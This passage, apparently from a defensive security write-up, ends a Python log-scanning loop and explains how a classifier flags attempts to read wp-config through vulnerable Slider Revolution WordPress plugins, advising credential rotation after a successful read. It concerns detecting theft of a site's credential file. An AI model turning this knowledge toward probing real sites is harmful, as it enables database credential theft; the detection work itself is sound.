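    for ip, img, status in scan_log(SAMPLE_LOG):
        print(ip, status, img)
```

The classifier flags the request regardless of status, because the Threatpost text above describes the actor spraying the same payload at sites that are not running the plugin at all; a 200 with a wp-config-sized body from a host that does run Slider Revolution below 4.2 is the case that warrants rotating the database password and the authentication keys and salts.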